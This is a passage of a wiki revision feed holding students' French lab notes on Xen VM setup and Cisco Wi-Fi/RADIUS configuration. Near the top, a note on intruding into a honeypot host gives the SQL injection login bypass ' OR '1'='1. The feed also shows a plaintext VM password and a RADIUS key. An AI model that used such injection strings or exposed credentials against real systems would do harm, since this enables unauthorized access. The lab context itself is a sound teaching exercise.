radius-server host 193.48.57.182 auth-port 1812 acct-port 1813 key 7 09414A191B0A051C0E1B0D2C22&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
10.60.100.10 : adresse IP fixe du point d'accès&lt;br /&gt;
&lt;br /&gt;
==Configuration WLC==&lt;br /&gt;
&lt;br /&gt;
Utilisation de bornes Cisco 2802i&lt;br /&gt;
&lt;br /&gt;
Connection via minicom -os (9600 bauds)&lt;br /&gt;
&lt;br /&gt;
 enable &lt;br /&gt;
 capwap ap ip &amp;lt;ip&amp;gt; &amp;lt;netmask&amp;gt; &amp;lt;gateway&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Intrusion honey.plil.info /&lt;br /&gt;
&lt;br /&gt;
pour avoir les identifiants de l'admin : ID = ' OR '1'='1 et MDP = ' OR '1'='1&lt;/div&gt;</summary>
		<author><name>Nekhlas-</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&amp;diff=53065</id>
		<title>TP sysres IMA5sc 2020/2021 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&amp;diff=53065"/>
				<updated>2020-11-02T16:01:12Z</updated>
		
		<summary type="html">&lt;p&gt;Nekhlas- : /* Configuration des bornes Wi-Fi */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Explication Infrastructure ==&lt;br /&gt;
&lt;br /&gt;
==Installation VM==&lt;br /&gt;
&lt;br /&gt;
Connexion ssh:&lt;br /&gt;
 ssh pifou@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
Commande (en root su -):&lt;br /&gt;
 xen-create-image --hostname=girolle --ip=100.64.0.24 --netmask=255.255.255.240 --dist=buster --dir=/usr/local/xen --password=glopglop --force&lt;br /&gt;
&amp;lt;br&amp;gt; MAJ gateway : 161&lt;br /&gt;
&amp;lt;br&amp;gt;Nom de domaine: girolle.site&lt;br /&gt;
&amp;lt;br&amp;gt;Adresse IP : 100.64.0.24 MAJ: 193.48.57.172&lt;br /&gt;
&amp;lt;br&amp;gt;Netmask: 255.255.255.240 MAJ: 255.255.255.224&lt;br /&gt;
&amp;lt;br&amp;gt;Adresse MAC : 00:16:3E:3E:E3:15&lt;br /&gt;
&lt;br /&gt;
Repartition des volumes logiques : &lt;br /&gt;
 lvdisplay &lt;br /&gt;
 lvrename &lt;br /&gt;
&lt;br /&gt;
Dans le fichier de configuration de la machine : girolle.cfg&lt;br /&gt;
on rajoute var et home :&lt;br /&gt;
lignes 'phy:/.../xdva3'&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Commandes pour creer et acceder a la VM :&lt;br /&gt;
&lt;br /&gt;
 xl create -c etc/xen/girolle.cfg&lt;br /&gt;
 '''xl console girolle'''&lt;br /&gt;
&lt;br /&gt;
Commandes sur la vm: &lt;br /&gt;
&lt;br /&gt;
dans etc/fstab il faut indiquer les fonctionnalites de xvda3 et xvda4 &lt;br /&gt;
&lt;br /&gt;
au prealable il faut &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
1) formater la partition : &lt;br /&gt;
 mkfs -t ext4 /dev/xvda4&lt;br /&gt;
&lt;br /&gt;
2) Monter la partition que l'on veut sur /mnt &lt;br /&gt;
 mount /dev/xvda4 /mnt&lt;br /&gt;
3) Migrer tout le contenu de var dans mnt &lt;br /&gt;
 cd /var&lt;br /&gt;
 mv * /mnt&lt;br /&gt;
&lt;br /&gt;
4) Dans le fichier fstab rajouter :&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
5) Unmout mnt &lt;br /&gt;
 umount /mnt&lt;br /&gt;
&lt;br /&gt;
6) Monter tout sur dev/xdva&lt;br /&gt;
 mount -a &lt;br /&gt;
7)Verification &lt;br /&gt;
 df&lt;br /&gt;
 dpkg -l&lt;br /&gt;
&lt;br /&gt;
==Redirection DNS==&lt;br /&gt;
&lt;br /&gt;
== Configuration des bornes Wi-Fi ==&lt;br /&gt;
&lt;br /&gt;
Borne classique : Cisco - AIR-CAP1602I-E-K9&lt;br /&gt;
&lt;br /&gt;
aaa new-model&lt;br /&gt;
!&lt;br /&gt;
!&lt;br /&gt;
aaa group server radius radius_girolle&lt;br /&gt;
 server 193.48.57.182 auth-port 1812 acct-port 1813&lt;br /&gt;
!&lt;br /&gt;
aaa authentication login eap_group1 group radius_group1&lt;br /&gt;
aaa authentication login eap_girolle group radius_girolle&lt;br /&gt;
!         &lt;br /&gt;
dot11 ssid SSID_GIROLLE&lt;br /&gt;
   vlan 107&lt;br /&gt;
   authentication open eap eap_girolle &lt;br /&gt;
   authentication network-eap eap_girolle &lt;br /&gt;
   authentication key-management wpa&lt;br /&gt;
!&lt;br /&gt;
!&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
...&lt;br /&gt;
interface BVI1&lt;br /&gt;
 ip address 10.60.100.10 255.255.255.240&lt;br /&gt;
!&lt;br /&gt;
radius-server host 193.48.57.182 auth-port 1812 acct-port 1813 key 7 09414A191B0A051C0E1B0D2C22&lt;br /&gt;
&lt;br /&gt;
==Configuration WLC==&lt;br /&gt;
&lt;br /&gt;
Utilisation de bornes Cisco 2802i&lt;br /&gt;
&lt;br /&gt;
Connection via minicom -os (9600 bauds)&lt;br /&gt;
&lt;br /&gt;
 enable &lt;br /&gt;
 capwap ap ip &amp;lt;ip&amp;gt; &amp;lt;netmask&amp;gt; &amp;lt;gateway&amp;gt;&lt;/div&gt;</summary>
		<author><name>Nekhlas-</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&amp;diff=52584</id>
		<title>TP sysres IMA5sc 2020/2021 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&amp;diff=52584"/>
				<updated>2020-10-12T17:03:07Z</updated>
		
		<summary type="html">&lt;p&gt;Nekhlas- : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Explication Infrastructure ==&lt;br /&gt;
&lt;br /&gt;
==Installation VM==&lt;br /&gt;
&lt;br /&gt;
Connexion ssh:&lt;br /&gt;
 ssh pifou@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
Commande (en root su -):&lt;br /&gt;
 xen-create-image --hostname=girolle --ip=100.64.0.24 --netmask=255.255.255.240 --dist=buster --dir=/usr/local/xen --password=glopglop --force&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Nom de domaine: girolle.site&lt;br /&gt;
&amp;lt;br&amp;gt;Adresse IP : 100.64.0.24&lt;br /&gt;
&amp;lt;br&amp;gt;Netmask: 255.255.255.240&lt;br /&gt;
&amp;lt;br&amp;gt;Adresse MAC : 00:16:3E:3E:E3:15&lt;br /&gt;
&lt;br /&gt;
Repartition des volumes logiques : &lt;br /&gt;
 lvdisplay &lt;br /&gt;
 lvrename &lt;br /&gt;
&lt;br /&gt;
Dans le fichier de configuration de la machine : girolle.cfg&lt;br /&gt;
on rajoute var et home :&lt;br /&gt;
lignes 'phy:/.../xdva3'&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Commandes pour creer et acceder a la VM :&lt;br /&gt;
&lt;br /&gt;
 xl create -c etc/xen/girolle.cfg&lt;br /&gt;
 '''xl console girolle'''&lt;br /&gt;
&lt;br /&gt;
Commandes sur la vm: &lt;br /&gt;
&lt;br /&gt;
dans etc/fstab il faut indiquer les fonctionnalites de xvda3 et xvda4 &lt;br /&gt;
&lt;br /&gt;
au prealable il faut &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
1) formater la partition : &lt;br /&gt;
 mkfs -t ext4 /dev/xvda4&lt;br /&gt;
&lt;br /&gt;
2) Monter la partition que l'on veut sur /mnt &lt;br /&gt;
 mount /dev/xvda4 /mnt&lt;br /&gt;
3) Migrer tout le contenu de var dans mnt &lt;br /&gt;
 cd /var&lt;br /&gt;
 mv * /mnt&lt;br /&gt;
&lt;br /&gt;
4) Dans le fichier fstab rajouter :&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
5) Unmout mnt &lt;br /&gt;
 umount /mnt&lt;br /&gt;
&lt;br /&gt;
6) Monter tout sur dev/xdva&lt;br /&gt;
 mount -a &lt;br /&gt;
7)Verification &lt;br /&gt;
 df&lt;br /&gt;
 dpkg -l&lt;/div&gt;</summary>
		<author><name>Nekhlas-</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&amp;diff=52583</id>
		<title>TP sysres IMA5sc 2020/2021 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&amp;diff=52583"/>
				<updated>2020-10-12T16:54:45Z</updated>
		
		<summary type="html">&lt;p&gt;Nekhlas- : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Explication Infrastructure ==&lt;br /&gt;
&lt;br /&gt;
==Installation VM==&lt;br /&gt;
&lt;br /&gt;
Connexion ssh:&lt;br /&gt;
 ssh pifou@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
Commande (en root su -):&lt;br /&gt;
 xen-create-image --hostname=girolle --ip=100.64.0.24 --netmask=255.255.255.240 --dist=buster --dir=/usr/local/xen --password=glopglop --force&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Nom de domaine: girolle.site&lt;br /&gt;
&amp;lt;br&amp;gt;Adresse IP : 100.64.0.24&lt;br /&gt;
&amp;lt;br&amp;gt;Netmask: 255.255.255.240&lt;br /&gt;
&amp;lt;br&amp;gt;Adresse MAC : 00:16:3E:3E:E3:15&lt;br /&gt;
&lt;br /&gt;
Repartition des volumes logiques : &lt;br /&gt;
 lvdisplay &lt;br /&gt;
 lvrename &lt;br /&gt;
&lt;br /&gt;
Dans le fichier de configuration de la machine : girolle.cfg&lt;br /&gt;
on rajoute var et home :&lt;br /&gt;
lignes 'phy:/.../xdva3'&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Commandes pour creer et acceder a la VM :&lt;br /&gt;
&lt;br /&gt;
 xl create -c etc/xen/girolle.cfg&lt;br /&gt;
 '''xl console girolle'''&lt;br /&gt;
&lt;br /&gt;
Commandes sur la vm: &lt;br /&gt;
&lt;br /&gt;
dans etc/fstab il faut indiquer les fonctionnalites de xvda3 et xvda4 &lt;br /&gt;
&lt;br /&gt;
au prealable il faut &lt;br /&gt;
1) formater la partition : &lt;br /&gt;
 mkfs -t ext4 /dev/xvda4&lt;br /&gt;
&lt;br /&gt;
2) Monter la partition que l'on veut sur /mnt &lt;br /&gt;
 mount /dev/xvda4 /mnt&lt;br /&gt;
3) Migrer tout le contenu de var dans mnt &lt;br /&gt;
 cd /var&lt;br /&gt;
 mv * /mnt&lt;br /&gt;
4) Unmout mnt &lt;br /&gt;
 umount /mnt&lt;br /&gt;
&lt;br /&gt;
5) Dans le fichier fstab rajouter :&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;/div&gt;</summary>
		<author><name>Nekhlas-</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&amp;diff=52572</id>
		<title>TP sysres IMA5sc 2020/2021 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&amp;diff=52572"/>
				<updated>2020-10-12T15:32:54Z</updated>
		
		<summary type="html">&lt;p&gt;Nekhlas- : /* Installation VM */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Explication Infrastructure ==&lt;br /&gt;
&lt;br /&gt;
==Installation VM==&lt;br /&gt;
&lt;br /&gt;
Connexion ssh:&lt;br /&gt;
 ssh pifou@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
Commande (en root su -):&lt;br /&gt;
 xen-create-image --hostname=girolle --ip=100.64.0.24 --netmask=255.255.255.240 --dist=buster --dir=/usr/local/xen --password=glopglop --force&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Nom de domaine: girolle.site&lt;br /&gt;
&amp;lt;br&amp;gt;Adresse IP : 100.64.0.24&lt;br /&gt;
&amp;lt;br&amp;gt;Netmask: 255.255.255.240&lt;br /&gt;
&amp;lt;br&amp;gt;Adresse MAC : 00:16:3E:3E:E3:15&lt;/div&gt;</summary>
		<author><name>Nekhlas-</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&amp;diff=52571</id>
		<title>TP sysres IMA5sc 2020/2021 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&amp;diff=52571"/>
				<updated>2020-10-12T15:32:33Z</updated>
		
		<summary type="html">&lt;p&gt;Nekhlas- : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Explication Infrastructure ==&lt;br /&gt;
&lt;br /&gt;
==Installation VM==&lt;br /&gt;
&lt;br /&gt;
connexion ssh:&lt;br /&gt;
 ssh pifou@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
commande (en root su -):&lt;br /&gt;
 xen-create-image --hostname=girolle --ip=100.64.0.24 --netmask=255.255.255.240 --dist=buster --dir=/usr/local/xen --password=glopglop --force&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Nom de domaine: girolle.site&lt;br /&gt;
&amp;lt;br&amp;gt;Adresse IP : 100.64.0.24&lt;br /&gt;
&amp;lt;br&amp;gt;Netmask: 255.255.255.240&lt;br /&gt;
&amp;lt;br&amp;gt;Adresse MAC : 00:16:3E:3E:E3:15&lt;/div&gt;</summary>
		<author><name>Nekhlas-</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&amp;diff=52570</id>
		<title>TP sysres IMA5sc 2020/2021 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&amp;diff=52570"/>
				<updated>2020-10-12T15:32:00Z</updated>
		
		<summary type="html">&lt;p&gt;Nekhlas- : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;quot;Explication Infrastructure&amp;quot;&lt;br /&gt;
&amp;quot;Installation VM&amp;quot;&lt;br /&gt;
&lt;br /&gt;
connexion ssh:&lt;br /&gt;
 ssh pifou@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
commande (en root su -):&lt;br /&gt;
 xen-create-image --hostname=girolle --ip=100.64.0.24 --netmask=255.255.255.240 --dist=buster --dir=/usr/local/xen --password=glopglop --force&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Nom de domaine: girolle.site&lt;br /&gt;
&amp;lt;br&amp;gt;Adresse IP : 100.64.0.24&lt;br /&gt;
&amp;lt;br&amp;gt;Netmask: 255.255.255.240&lt;br /&gt;
&amp;lt;br&amp;gt;Adresse MAC : 00:16:3E:3E:E3:15&lt;/div&gt;</summary>
		<author><name>Nekhlas-</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&amp;diff=52569</id>
		<title>TP sysres IMA5sc 2020/2021 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&amp;diff=52569"/>
				<updated>2020-10-12T15:31:27Z</updated>
		
		<summary type="html">&lt;p&gt;Nekhlas- : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;quot;Explication Infrastructure&amp;quot;&lt;br /&gt;
&amp;quot;Installation VM&amp;quot;&lt;br /&gt;
&lt;br /&gt;
connexion ssh:&lt;br /&gt;
 ssh pifou@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
commande (en root su -):&lt;br /&gt;
 xen-create-image --hostname=girolle --ip=100.64.0.24 --netmask=255.255.255.240 --dist=buster --dir=/usr/local/xen --password=glopglop --force&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Nom de domaine: girolle.site&lt;br /&gt;
&amp;lt;br&amp;gt;IP : 100.64.0.24&lt;br /&gt;
&amp;lt;br&amp;gt;netmask: 255.255.255.240&lt;br /&gt;
&amp;lt;br&amp;gt;Adresse MAC : 00:16:3E:3E:E3:15&lt;/div&gt;</summary>
		<author><name>Nekhlas-</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&amp;diff=52568</id>
		<title>TP sysres IMA5sc 2020/2021 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&amp;diff=52568"/>
				<updated>2020-10-12T15:30:40Z</updated>
		
		<summary type="html">&lt;p&gt;Nekhlas- : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;quot;Explication Infrastructure&amp;quot;&lt;br /&gt;
&amp;quot;Installation VM&amp;quot;&lt;br /&gt;
&lt;br /&gt;
connexion ssh:&lt;br /&gt;
 ssh pifou@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
commande (en root su -):&lt;br /&gt;
 xen-create-image --hostname=girolle --ip=100.64.0.24 --netmask=255.255.255.240 --dist=buster --dir=/usr/local/xen --password=glopglop --force&lt;br /&gt;
&lt;br /&gt;
Nom de domaine: girolle.site&lt;br /&gt;
&amp;lt;br&amp;gt;IP : 100.64.0.24&lt;br /&gt;
netmask: 255.255.255.240&lt;/div&gt;</summary>
		<author><name>Nekhlas-</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&amp;diff=52567</id>
		<title>TP sysres IMA5sc 2020/2021 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&amp;diff=52567"/>
				<updated>2020-10-12T15:29:56Z</updated>
		
		<summary type="html">&lt;p&gt;Nekhlas- : Page créée avec « &amp;quot;Explication Infrastructure&amp;quot; &amp;quot;Installation VM&amp;quot;  connexion ssh:  ssh pifou@capbreton.plil.info  commande (en root su -):  xen-create-image --hostname=girolle --ip=100.64.0.... »&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;quot;Explication Infrastructure&amp;quot;&lt;br /&gt;
&amp;quot;Installation VM&amp;quot;&lt;br /&gt;
&lt;br /&gt;
connexion ssh:&lt;br /&gt;
 ssh pifou@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
commande (en root su -):&lt;br /&gt;
 xen-create-image --hostname=girolle --ip=100.64.0.24 --netmask=255.255.255.240 --dist=buster --dir=/usr/local/xen --password=glopglop --force&lt;br /&gt;
&lt;br /&gt;
Nom de domaine: girolle.site&lt;br /&gt;
IP : 100.64.0.24&lt;br /&gt;
netmask: 255.255.255.240&lt;/div&gt;</summary>
		<author><name>Nekhlas-</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021&amp;diff=52559</id>
		<title>TP sysres IMA5sc 2020/2021</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021&amp;diff=52559"/>
				<updated>2020-10-12T14:58:07Z</updated>
		
		<summary type="html">&lt;p&gt;Nekhlas- : /* Répartition des binômes */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Répartition des binômes ==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Cahier !! Elèves &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G1 | Cahier groupe n°1]]&lt;br /&gt;
| NOM Prénom &amp;amp; NOM Prénom&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G2 | Cahier groupe n°2]]&lt;br /&gt;
| NOM Prénom &amp;amp; NOM Prénom&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G3 | Cahier groupe n°3]]&lt;br /&gt;
| NOM Prénom &amp;amp; NOM Prénom&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G4 | Cahier groupe n°4]]&lt;br /&gt;
| NOM Prénom &amp;amp; NOM Prénom&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G5 | Cahier groupe n°5]]&lt;br /&gt;
| RINGOT Loïc &amp;amp; SANCHEZ Pierre&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G6 | Cahier groupe n°6]]&lt;br /&gt;
| NDUWAMUNGU Jean De Dieu &amp;amp; MOINAT Théau&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G7 | Cahier groupe n°7]]&lt;br /&gt;
| EKHLAS EID Nour &amp;amp; BISALLI Clara&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G8 | Cahier groupe n°8]]&lt;br /&gt;
| NOM Prénom &amp;amp; NOM Prénom&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G9 | Cahier groupe n°9]]&lt;br /&gt;
| VIEUBLED Tanguy &amp;amp; VERNIER Paul&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G10 | Cahier groupe n°10]]&lt;br /&gt;
| NOM Prénom &amp;amp; NOM Prénom&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G11 | Cahier groupe n°11]]&lt;br /&gt;
| NOM Prénom &amp;amp; NOM Prénom&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G12 | Cahier groupe n°12]]&lt;br /&gt;
| NOM Prénom &amp;amp; NOM Prénom&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G13 | Cahier groupe n°13]]&lt;br /&gt;
| NOM Prénom &amp;amp; NOM Prénom&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G14 | Cahier groupe n°14]]&lt;br /&gt;
| NOM Prénom &amp;amp; NOM Prénom&lt;br /&gt;
|}&lt;/div&gt;</summary>
		<author><name>Nekhlas-</name></author>	</entry>

	</feed>